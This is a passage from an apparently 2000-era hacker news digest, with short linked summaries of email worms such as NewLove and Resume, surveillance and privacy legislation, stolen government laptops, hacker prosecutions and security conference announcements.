      "Ms. Stewart said the information in the computer database is safe
      because it is "encrypted," but then told the Commons that six
      unidentified HRDC employees have access to unencrypted information in
      the database."
      
      Toronto News
      Ottawa News
      
      http://www.globeandmail.com/gam/National/20000517/UPRIVN.html
      http://www.nationalpost.com/news.asp?f
      http://www.canoe.ca/TorontoNews/ts.ts-05-18-0015.html
      http://www.canoe.ca/OttawaNews/OS.OS-05-17-0008.html
      @HWA
      

 53.0 [HNN] May 19'00 NewLove - Dangerous Variant on the Loose 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by altomo 
      One of the over 40 variants of ILOVEYOU has the potential to be a
      serious threat to computer users. The 'New Love' worm is still sent as
      an attachment that a user must click on but now it now deletes all
      files on a hard drive and mapped network drives. In addition it
      randomly alters itself making it polymorphic and harder to defend
      against. The worm was first discovered in Israel and is thought to
      have come from someplace in Europe. So far it has infected only a few
      systems in Europe and California. All of the major anti-virus
      companies have added 'New Love' to their definition files.
      
      Associated Press - via Yahoo
      ZD Net
      ABC
      C|Net
      
      Symantec
      F-Secure
      McAfee
      Sophos
      
      http://dailynews.yahoo.com/h/ap/20000519/tc/new_love_bug_4.html
      http://www.zdnet.com/zdnn/stories/news/0,4586,2572454,00.html
      http://abcnews.go.com/sections/tech/dailynews/virus000519.html
      http://news.cnet.com/news/0-1005-200-1899852.html?tag
      http://www.symantec.com
      http://www.f-secure.com
      http://www.mcafee.com
      http://www.sophos.com
      @HWA
      
      
 54.0 [HNN] May 19'00 Old CIA Head Warns of Spy-Viruses 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by aleph1 
      Former CIA director R. James Woolsey has warned that new threats will
      come in the form of 'instructive' viruses as opposed to destructive.
      Unlike Melissa, ILOVEYOU, CIH, and others this new breed of viruses
      would use covert techniques to gather sensitive data and return it to
      international spies and terrorists
      
      Security Focus
      
      http://www.securityfocus.com/news/38
      @HWA
      
      
 55.0 [HNN] May 19'00 Fed Slow In Virus Reaction 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by William Knowles 
      Experts in government information systems told members of the General
      Accounting Office that the government was slow in reacting to
      ILOVEYOU. he said that government agencies where not given enough time
      to respond to the crisis which resulted in substantial damage to
      government systems and information.
      
      Associated Press - via Excite
      
      http://news.excite.com/news/ap/000518/16/love-bug-impact
      @HWA
      
      
 56.0 [HNN] May 19'00 FCC's Attempted Expansion of CALEA In Court 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by JavaJ 
      The U.S. Court of Appeals in Washington is hearing arguments over the
      rules issued last year by the Federal Communication Commission
      detailing how telecommunications companies must comply with the
      Communications Assistance for Law Enforcement Act (CALEA), passed by
      Congress in 1994. The FCC mandated that telephone lines must be
      compatible with surveillance equipment, traceable cell phones with
      post dialing digits (account numbers, voice mail passwords, etc.), and
      tappable packet-mode communications or Internet traffic. The FCC
      mandated that all of this information would be turned over simply for
      the asking with no warrant involved. The Center for Democracy and
      Technology is arguing that the FCC overstepped its bounds and that the
      FCC rules are in fact unconstitutional.
      
      MSNBC - via ZD Net
      Center For Democracy and Technology
      
      http://www.zdnet.com/zdnn/stories/news/0,4586,2570897,00.html?chkpt
      http://www.cdt.org/
      @HWA
      
 57.0 [HNN] May 19'00 Russian Computer Crime on the Rise 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by William Knowles 
      Vitaly Degterev, first deputy chief of the Interior Ministry's
      department on high-tech crimes was quoted by the ITAR-TAS news agency
      as saying that there was more Russian cyber crime in the first three
      months of 2000 than in all of of 1999. From January to March of 2000
      over 200 cases of computer attacks had been reported, in all of 1999
      there were only 80 cases.
      
      Associated Press
      
      http://cnn.com/2000/TECH/computing/05/17/russia.hackers.ap/index.html
      @HWA
      
 58.0 [HNN] May 19'00 J0n Pleads Guilty in Canada 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by root66 
      A teenager from Canada, known online as J0n, has pleaded guilty to
      charges in a Montreal court of defacing a NASA web page and of
      penetrating the systems of several Canadian and foreign institutions
      including Harvard and MIT. Following the surprise plea the judge
      served the maximum sentence of 240 hours of community work plus one
      year's probation, restricted use of a computer, and ordered the
      defendant to deliver a speech at a local high school court on the
      evils of hacking.
      
      NewsBytes - via USA Today
      
      http://www.usatoday.com/life/cyber/nb/nb3.htm
      @HWA
      
 59.0 [HNN] May 19'00 Electronically Attacking a Bank 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Sangfroid 
      Think your local neighborhood bank is safe from cyber attack? Think
      again. David H. Freedman has published a step by step guide of one way
      to break into a bank and siphon off 10 to 100 million bucks. Do you
      work at a bank? Better read this.
      
      Forbes
      
      http://www.forbes.com/asap/00/0403/056.htm
      @HWA
 
 60.0 [HNN] May 22'00 NAI Removes NetBus Pro from Scanner 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Judd 
      NetBus Pro 2.10, a remote administration tool by UltraAccess.net, has
      been removed from the McAffee Virus Scan software by Network
      Associates. NAI's change in attitude toward NetBus Pro 2.10 was not
      the result of back room negotiations, but rather upon the advice of
      McAfee's own legal counsel. Upon learning this, UltraAccess has been
      in communication with several other AV vendors, who also have agreed
      to remove detection of NetBus Pro. Information will be released as it
      develops.
      
      UltraAccess.net
      
      http://www.netbuspro.com
      @HWA
      
      
 61.0 [HNN] May 22'00 Brits Lose Another Laptop 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by William Knowles 
      A British Intelligence officer had his laptop stolen after he put it
      down at a London railway station. Officials say that the laptop did
      not contain classified information but unconfirmed reports indicate
      that it did have specifications for the next generation of fighter
      aircraft and details of how they can be controlled from the ground.
      This is the second laptop stolen from Paddington Station in as many
      months and follows several other recent thefts.
      
      The Times UK
      
      http://www.the-times.co.uk/news/pages/sti/2000/05/21/stinwenws01039.ht
      ml
      @HWA
      
      
 62.0 [HNN] May 22'00 State Department Audits Missing Laptops 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by William Knowles 
      The State Department has discovered that 15 of its 1,913 unclassified
      laptops have been either stolen or misplaced in the last 18 months.
      The survey conducted by the department's Bureau of Diplomatic Security
      only found only one missing classified laptop out of 60.
      
      Washington Post
      
      http://washingtonpost.com/wp-dyn/articles/A23562-2000May17.html
      @HWA
      
      
 63.0 [HNN] May 22'00 Researchers Develop New Breed of Security Tool 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Evil Wench 
      This press release is a little short on the technical details but it
      would appear that researchers at the Department of Energy's Sandia
      National Laboratories has built a Hueristic Distributed Security
      Agent. The agent is supposedly able to match incoming threats against
      its fingerprint database but also learn and distinguish new threats on
      the fly. Researchers say that an initial release to sensitive
      government systems will happen within a year and to the civilian
      market within three years.
      
      EurekAlert
      
      http://www.eurekalert.org/releases/snl-chs051800.html
      @HWA
      
      
 64.0 [HNN] May 22'00 Original ILOVEYOU Author Surfaces in Australia 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by tall.drink 
      The Australian that brought down the Australian Republican Movement's
      telecommunications system has told the media that it may have been
      himself who wrote the original worm upon which the world's latest
      email virus, ILOVEYOU, is based. Valiant wants to make it clear that
      someone else added the malicious payload. (Sorta seems like a
      publicity stunt to promote his company.)
      
      Sydney Morning Herald
      Wired
      
      http://www.smh.com.au/news/0005/22/pageone/pageone15.html
      http://www.wired.com/news/technology/0,1282,36477,00.html
      @HWA
      
 
 65.0 [HNN] May 23'00 Secret Searches Reintroduced to Congress 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by JavaJ 
      The Center for Democracy and Technology has sent out a warning
      regarding several bills currently before Congress that contain
      suspicious wording that could be interpreted to violate the Fourth
      Amendment. The language brings back the 'secret search' provisions of
      the Cyberspace Electronic Security Act that was tossed out after the
      draft was leaked to the press. Now secret searches are being
      reintroduced into several bills as small little noticed amendments.
      The time to act is now.
      
      CDT Warning
      Center for Democracy and Technology
      
      http://www.cdt.org
      @HWA
      
      
 66.0 [HNN] May 23'00 FTC Wants Control Over Privacy 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Evil Wench 
      The Federal Trade Commission has asked Congress for authority to
      regulate how companies use personal information collected on their Web
      sites. After concluding the industry failed to safeguard consumer
      privacy through self-regulation, the commission recommended that
      lawmakers pass legislation to bolster its ability to oversee online
      privacy.
      
      Nando Times
      ZD Net
      
      House Republicans think the FTCs move may be nothing more than
      election year politics.
      
      Nando Times
      
      http://www.nandotimes.com/technology/story/body/0,1634,500207162-50028
      9092-501566171-0,00.html
      http://www.zdnet.com/zdnn/stories/news/0,4586,2574082,00.html
      http://www.nandotimes.com/technology/story/body/0,1634,500206866-50028
      8569-501560300-0,00.html
      @HWA
      
      
 67.0 [HNN] May 23'00 Computer Attackers To get Even Higher Sentences 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by acopalyse 
      At a conference on critical infrastructure protection Sens. John Kyl,
      R-Ariz., and Dianne Feinstein, D-Calif. announced that they are
      working on a bill to increase the sentences for computer attackers.
      The new bill would double the maximum jail term to ten years for
      convicted computer attackers. The legislation will probably be
      introduced later this week. (Increased jail time only costs the
      taxpayer money and does nothing to prevent other crimes or reform the
      perpetrator.)
      
      Newsbytes
      
      http://www.newsbytes.com/pubNews/00/149449.html
      @HWA
      
      
 68.0 [HNN] May 23'00 Australia Loses Sensitive Laptops 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by William Knowles 
      Five laptops have turned up missing and are presumed stolen in what
      looks like an inside job at Australia's Parliament House. The laptops
      have been valued at $30,000 ($17,169 U.S.D.) and could allow intruders
      access to the parliamentary network.
      
      Australian IT
      
      http://australianit.com.au/common/storyPage/0,3811,715221%255E442,00.h
      tml
      @HWA
      
      
 69.0 [HNN] May 23'00 Hong Kong to Create Cyber Response Team 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by William Knowles 
      The Deputy Secretary for Information Technology and Broadcasting, Alan
      Siu Yu-bun, has said that an agreement has been reached in principle
      to create a Computer Emergency Response Team. It is hoped that the
      Team will not be a government agency but will instead form as a
      non-profit organization. Funding for the Team will hopefully come from
      the Information and Technology Fund.
      
      Hong Kong Standard
      
      http://online.hkstandard.com/today/default.asp?PageType
      @HWA
      
      
 70.0 [HNN] May 23'00 South Africa Forms CyberCrime Unit 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Roelof 
      Nasser Mohammed, the director of crime services at the South African
      Police Services (SAPS), has announced the creation of the South
      African Cybercrime Unit. Officials are actively searching for recruits
      to the new posts and have not as yet determined its size.
      
      Net Assets
      
      http://www.netassets.co.za/netassets/sitewide/content/direct/1,2275,62
      1905-5858-0,00.html
      @HWA
      

 71.0 [HNN] May 24'00 Info-Con Ratings To Be Used for Cyber Threats 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by acopalyse 
      The Pentagon has decided to post threat condition assessments when it
      is under an information warfare attack. Info-Cons or "information
      conditions" will be decided by US Space Command which is the home of
      JTF-CND. Reactions to Info-Con warnings could range from rejecting
      e-mails from unknown addresses to shutting down the networks. It is
      hoped that "Information Condition" warning levels will be defined
      within the next few weeks.
      
      ABC News
      
      http://abcnews.go.com/sections/tech/DailyNews/pentagon000523.html
      @HWA
      
      
 72.0 [HNN] May 24'00 Ticketmaster to Sell RootFest Tickets 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by lothos 
      RootFest tickets are now available via all TicketMaster locations,
      including their web site. Tickets can still be purchased during the
      event at the RiverCentre Box Office. Rootfest, the Midwest's premier
      computer security event, will be held June 14 - 16 in Minneapolis,
      Minnesota.
      
      TicketMaster
      RootFest
      
      https://ticketing.ticketmaster.com/cgi/purchasePage.asp?event_id
      http://www.rootfest.org
      @HWA
      
      
 73.0 [HNN] May 24'00 Zero-Knowledge Teams With IBM 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Craig 
      Zero-Knowledge Systems and IBM announce yesterday at ISPCON in Orlando
      that they will partner together to offer privacy solutions to ISPs.
      Over the next 12 months, IBM and Zero-Knowledge(r) will install 1,000
      IBM Netfinity 4000R servers running Zero-Knowledge's Freedom software,
      at hundreds of ISPs and telecommunication backbone nodes throughout
      the world to expand the cryptographically assured global privacy
      infrastructure of the Freedom network.
      
      At Internet World in London Zero Knowledge announced an alliance with
      Carrier1 International S.A. to enable private Internet use for
      European citizens by deploying Freedom Network servers at major
      routing points across Europe.
      
      Zero Knowledge
      
      http://www.zeroknowledge.com
      @HWA
      
 74.0 [HNN] May 24'00 The Little Miscreants That Could 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by evenprime
      Mafiaboy and Curador, investigated and discovered by the FBI, or where
      there other people involved? Is the FBI really that good as to be able
      to track these teenage troublemakers down?
      
      ZD Net
      
      http://www.zdnet.com/zdnn/stories/comment/0,5859,2573856,00.html
      @HWA
      
 75.0 [HNN] May 24'00 French Say No Anonymity on Web 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by acopalyse 
      Sponsored by the French Government the Liberty of Communication Act
      would require all web publishers to register with authorities. This
      would essentially eliminate all anonymous web postings. The
      legislation, passed has passed the French House and being debated in
      the Senate this week, would apply to any company that hosts World Wide
      Web pages viewable by the public.
      
      Associated Press - via San Jose Mercury News
      
      http://www.mercurycenter.com/svtech/news/breaking/ap/docs/25664l.htm
      @HWA
      
      
 76.0 [HNN] May 24'00 Experts Stress Education Over Laws 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Evil Wench 
      During the National Colloquium for Information Systems Security
      Education in Washington, D.C. experts stressed that education,
      research and development programs, are where the solutions to
      cybercrime will come from and not more laws and jail time.
      
      Federal Computer Week
      
      http://www.fcw.com/fcw/articles/2000/0522/web-cyber-05-24-00.asp
      @HWA
 
 77.0 [HNN] May 25'00 NHL Hit with DDoS 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by acopalyse 
      The National Hockey League was hit with a Distributed Denial of
      Service attack on Sunday which knocked it off line. NHL technicians
      where still trying to filter out the illegitimate requests yesterday.
      The league has said that it has filed a formal complaint with the FBI
      and have asked several security firms to help.
      
      Associated Press - via San Jose Mercury News
      
      http://www.mercurycenter.com/svtech/news/breaking/ap/docs/31233l.htm
      @HWA
      
      
 78.0 [HNN] May 25'00 FCC Rules Under Appeal 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Evil Wench 
      The US Court of Appeals in Washington is hearing arguments regarding
      rules issued last year by the FCC. The rules spell out how
      telecommunications carriers will need to comply with the
      Communications Assistance Enforcement Act (CALEA). The rules require
      carriers to impliment technology to pinpoint celluar phone users
      without a warrant and give the FBI the capability to intercept
      Internet traffic.
      
      ZD Net
      
      http://www.zdnet.com/zdnn/stories/news/0,4586,2570897,00.html?chkpt
      @HWA
      
 79.0 [HNN] May 25'00 Privacy Issue Still Hot In DC 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by root66 
      Sen. Fritz Hollings (D-S.C.), will introduce legislation that will
      require Web sites to conform to the FTC's fair information practices,
      meaning that they would have to provide consumers notice about,
      consent for and access to information collected online, as well as
      ensure security of that data. The Senate Commerce Committee will hold
      a hearing Thursday on the FTC's recommendation that the government
      needs to force web sites to comply with privacy initiatives. The FTC
      has been accused of wanting to regulate the problem as opposed to
      identifying the cause and finding solutions.
      
      Civic.com
      
      http://www.civic.com/civic/articles/2000/0522/web-3ftc-05-24-00.asp
      @HWA
      
      
 80.0 [HNN] May 25'00 Australia Electoral Information Sold For Tax Mailing 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by hool54000 
      Following the revelation two weeks ago that Canada maintains a massive
      database on its citizens it has now been learned that the Australian
      Electoral Commission has sold the information it had (age, address,
      marital status, etc.) to the taxation department. The Australian
      Taxation Office used the information to conduct a mass mailing about
      new taxation laws.
      
      Australian Broadcasting Commission
      News Limted
      
      http://www.abc.net.au/news/2000/05/item20000525004954_1.htm
      http://www.news.com.au/common/story_page/0,4057,726998%255E1702,00.htm
      l
      @HWA
      
      
 81.0 [HNN] May 25'00 Cybercops Meet in Boston 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by no0ne 
      Attorney Generals from the state of Massachusetts and other law
      enforcement personnel will gather in Waltham MA, for a conference on
      computer crime. Other attendees include Weld Pond from the @stake
      L0pht Labs. The discussion will center around the 'new criminal
      frontier', how to assess a network's vulnerabilities, and what options
      are available for cybercrime victims. The conference will be held from
      1 p.m. to 5:30 p.m. today at the Westin Hotel in Waltham, MA.
      
      Boston Herald
      
      http://www.bostonherald.com/business/technology/hack05242000.htm
      @HWA
      
      
 82.0 [HNN] May 25'00 CERT Releases Advisory on Week Old Issue 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Space Rogue 
      The Computer Emergency Response Team at Carnegie Mellon has issued
      advisory CA-2000-07 regarding Microsoft Office 2000 UA ActiveX
      Control. The advisory was issued yesterday in the late afternoon. The
      @stake L0pht Labs initially released their advisory, demonstration
      code, and patch ten days before.
      
      @stake L0pht Labs
      CERT
      Microsoft
      
      http://www.l0pht.com/advisories/msoua.txt
      http://www.cert.org/advisories/CA-2000-07.html
      http://microsoft.com/technet/security/bulletin/ms00-034.asp      
      @HWA
      
 
 83.0 [HNN] May 26'00 Physical Security Is Real Weak 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Evil Wench 
      A report issued by the General Accounting Office details how armed
      investigators breached security at several government installations
      using phony IDs and credentials purchased off the Internet. At the
      Pentagon, CIA, Justice Department, FBI, State Department and 14 other
      agencies investigators where able to gain access to the buildings
      without being searched and often times being waived past security
      checkpoints.
      
      Knight Ridder - via The Age
      CNN
      
      http://www.theage.com.au/breaking/0005/25/A17287-2000May25.shtml
      http://www.cnn.com/2000/US/05/24/security.breaches/index.html
      @HWA
      
      
 84.0 [HNN] May 26'00 Reno Does About Face 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by tjadams69 
      "I think any time you expose vulnerabilities it's a good thing," said
      Attorney General Janet Reno. Her comment was directed to investigators
      who posed as false security agents to gain access to supposedly secure
      government buildings. How does 'exposing vulnerabilities' go from good
      in the real world to bad in the cyber world?
      
      CNN
      
      http://www.cnn.com/2000/US/05/25/security.breaches.01/index.html
      @HWA
      
      
 85.0 [HNN] May 26'00 Extortionist Busted 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by no0ne 
      A single charge of using the internet to send extortion threats has
      been filed against Rob Holcomb. Via his e-mails to Audible Inc., a New
      Jersey based company which sells on line books, the 36 year old
      graduate student of Colorado State University claimed to have found a
      way to download the books for free and would not reveal the system's
      weakness except in exchange for money, a car and unlimited free
      download of the company's content. Audible contacted the police who
      traced the alleged perpetrator after he gave the company a mailing
      address and phone number at the school. Holcomb could face up to two
      years in prison and a $100,000 fine.
      
      Associated Press - via Las Vegas Sun
      Internet News
      
      http://www.lasvegassun.com/sunbin/stories/tech/2000/may/25/052500388.h
      tml
      http://www.internetnews.com/bus-news/article/0,2171,3_380531,00.html
      @HWA
      
      
 86.0 [HNN] May 26'00 Australian Man Leaks Sewage Via Computer and Radio 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Evil Wench 
      An alleged computer intruder used radio transmissions to alter sewage
      pump stations causing raw sewage to overflow on Queensland's Sunshine
      Coast. The 49-year-old Brisbane man is expected to face 371 charges
      when he appears in the Maroochydore Magistrates Court on June 15. The
      charges include stealing, computer intrusion and using radio
      communications equipment without authority.
      
      AAP Newsfeed - via Lexis-Nexis
      
      http://web.lexis-nexis.com/more/cahners-chicago/11407/5873217/1
      @HWA
      
      
 87.0 [HNN] May 26'00 2600 Keeps Lawyer 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Macki 
      Judge Kaplan has ruled that the law firm Frankfurt, Garbus, Klein &
      Selz can continue to represent 2600 in their battle against Time
      Warner and the other plaintiffs over the posting of the DeCSS code.
      The plaintiffs had argued that due to the firms representation of Time
      Warner in other matters it would be a conflict of interest to
      represent 2600. The Judge disagreed.
      
      2600
      
      http://www.2600.org/news/2000/
      @HWA
      
      
 88.0 [HNN] May 26'00 Preliminary Defcon Speaking Schedule 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by DTangent 
      In preparation for Defcon 8 to be held in Las Vegas at the end of July
      organizers have released a preliminary speaking schedule. Organizers
      have also updated the media archives section of the site containing
      film clips, documentaries and other tidbits from Defcons past.
      
      Defcon 8
      
      http://www.defcon.org/
      @HWA
      
      
 89.0 [HNN] May 26'00 Underground Site Form Alliance 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Gh0zT 
      A new alliance has been announced between established computer
      security sites including the Fringe of the Web, and Project Gamma.
      This new alliance hopes to increase the quality of content available
      to its member sites.
      
      Iron Box Technologies
      
      http://www.ironboxtech.com/
      @HWA
      

 90.0 [HNN] May 30'00 Viruses, Viruses, and more Viruses 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by acopalyse and Weld Pond 
      Computer Associates has warned about a dangerous new virus called
      Cybernet it spreads by attaching to outgoing e-mail just like the
      Melissa Virus. Cybernet infects Microsoft Word and Excel files. The
      e-mail arrives with a subject line "You've GOT Mail !!!" and the text
      of the message reads: "Please, save the document after you read and
      don't show to anyone else."
      
      Newsbytes
      
      Kak Spreading Fast
      ShoppingPlanet.com accidentally infected 50,000 of its customers when
      it mailed its newsletter out. The newsletter was infected with the Kak
      virus. The company quickly sent out a follow up email warning users
      not to open the previous email. Kak requires no users intervention
      other than opening email. Anti-virus software vendors have included
      the virus in their definitions files. Kak only spreads via MS Outlook
      users, Microsoft issued a patch last year to correct the problem.
      
      ZD Net
      
      
 91.0 [HNN] May 30'00 Resume on the Loose
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      A new variant of the old Melissa virus is spreading rapidly. This new
      variant has a much deadlier payload that will delete the contents in
      the system and root directories of Windows and Windows NT. It arrives
      as an attachment with a subject line of 'Resume - Janet Simons'
      
      C|Net
      Tech Web
      MSNBC
      ABC News CNN
      Microsoft - Outlook Email Security Update
      Norton
      Symantec
      
      http://www.newsbytes.com/pubNews/00/149635.html
      http://www.zdnet.com/zdnn/stories/news/0,4586,2578234,00.html
      http://news.cnet.com/news/0-1005-200-1960645.html
      http://www.techweb.com/wire/story/TWB20000526S0016
      http://www.msnbc.com/news/412717.asp
      http://abcnews.go.com/sections/tech/DailyNews/virus000527.html
      http://www.cnn.com/2000/TECH/computing/05/27/new.virus.resume/index.ht
      ml
      http://officeupdate.microsoft.com/2000/articles/Out2ksecarticle.htm
      http://vil.nai.com/villib/dispvirus.asp?virus_k
      http://www.symantec.com/avcenter/venc/data/w97m.melissa.bg.html
      @HWA
      
      
 92.0 [HNN] May 30'00 Gauntlet Firewall Breached 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by no0ne 
      "The world's most secure" firewall was breached during a routine
      security audit by Jim N. Stickley an employee of Garrison Technologies
      in Austin TX. The hole, a modified buffer overflow attack, could allow
      an intruder to control the firewall box. Network Associates has issued
      a patch for the problem.
      
      Business Week
      Network Associates
      
      http://www.businessweek.com/bwdaily/dnflash/may2000/nf00526f.htm
      http://www.nai.com/
      @HWA
      
      
 93.0 [HNN] May 30'00 Software Glitch Short Changes Lottery Winners 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by acopalyse 
      A former employee of GTech Holdings says the U.S. firm knew a computer
      software glitch was short-changing some British lottery winners but
      held off telling the operator, Camelot Group. Britain's independent
      National Lottery Commission (NLC) said last Saturday the defect caused
      computers to think there were more winners than there actually were
      diluting the prize pool.
      
      Reuters - via San Jose Mercury News
      
      http://www.mercurycenter.com/svtech/news/breaking/reuters/docs/39166l.
      htm
      @HWA
      
      
 94.0 [HNN] May 30'00 Cyberstalking: Hype or Reality 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Lewis 
      Just how serious is cyberstalking? Some estimates put the number of
      stalkers at 200,000, but no one really knows where that number came
      from. Sure there have been real world victims but does it warrant all
      the hype?
      
      ZD Net
      
      http://www.zdnet.com/intweek/stories/columns/0,4164,2577187,00.html
      @HWA
      
      
 95.0 [HNN] May 30'00 Sexy Geeks and Hackers 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Weld Pond 
      Free software advocates and free love advocates seem to populate
      similar groups, but does membership in one automatically mean your a
      member of the other?
      
      Salon
      
      http://www.salon.com/tech/feature/2000/05/26/free_love/index.html
      @HWA
      
      
 96.0 [HNN] May 30'00 DC Metro Web Site Defaced 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Evil Wench
      The Washington DC Metropolitan Transit Authority was defaced yesterday
      by someone who apparently did not appreciate the actions of the rock
      group Metallica. The defaced page contained numerous obscenities and
      criticism of the band's lawsuit against Napster.
      
      Associated Press - via Washington Post
      Attrition.org - mirror of defaced page
      
      http://www.washingtonpost.com/wp-dyn/articles/A26914-2000May29.html
      http://www.attrition.org/mirror/attrition/2000/05/29/www.wmata.com/
      @HWA
      
      
 97.0 [HNN] May 30'00 Mitnick to Challenge Computer Ban 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by acopalyse 
      Publisher Steven Brill, who wants to hire Kevin Mitnick as a
      columnist, has retained the services of esteemed New York attorney
      Floyd Abrams. Abrams will file a friend of the court brief to assist
      Kevin in his fight to lift the bail restrictions placed on him to
      prevent him from speaking his mind and earning a living.
      
      C|Net
      
      http://news.cnet.com/news/0-1005-200-1951220.html?tag
      @HWA
      
      
 98.0 [HNN] May 30'00 Black Hat Posts Speaker Lists, Adds Old Video Clips 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Dark Tangent 
      The Blackhat web site has added video on-line from past shows,
      including an excellent key-note speech from Marcus Ranum on how to
      "really" secure the Internet, a must see. Presentations from BH Asia
      are available as well, with video added shortly. At BH US this year
      there will be new security vulnerabilities discussed including
      transitioning from ring 3 to ring 0 in Windows NT (Breaking their
      security model), tricks to defeating parts of Firewall-1, and Mudge
      will talk in depth on passive detection techniques for locating
      sniffers, based on his work with Anti-sniff.
      
      Blackhat
      
      http://www.blackhat.com
      @HWA
      
  99.0 [IND] Pokemon virus hits U.S targetting kids
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
      Cuddly Pokemon Virus Targets Kids
      By Richard Meares, Reuters August 24, 2000 Children everywhere beware  
      Pikachu is not as cuddly as he seems. 
      
      The Pokemon character has mutated into a nasty little virus, spreading via 
      email like the devastating "Love Bug" did. 
      
      Virus experts said Thursday that the cute yellow rabbit-like creature, a 
      darling of the Pokemon videogame family, is appearing in the United States 
      as a computer virus, wrecking PCs by wiping out their system files. 'These 
      computers may take you into cyberspace, but they are also running the 
      world.' -- Eric Chien, Symantec      

      So far "Pokey" has sown only a fraction of the havoc its famous 
      predecessor did, but he's giving both computer experts and parents cause 
      for concern. Kids, not corporations, are the target of the cybervandals 
      this time. 
            
      "We haven't seen viruses or worms targeted at children before," said Eric 
      Chien, chief researcher at antivirus company Symantec's Dutch laboratory. 
            
      "This is the first one." 
      
      "Since it comes as a little Pokemon animation, 10-year-olds are likely to 
      be more interested in double-clicking on it." 
      
      Viruses infect a computer and cause damage, but rely on users to 
      unwittingly spread them from one computer to another. Worms find their own 
      way to spread, usually on the Web. 
      
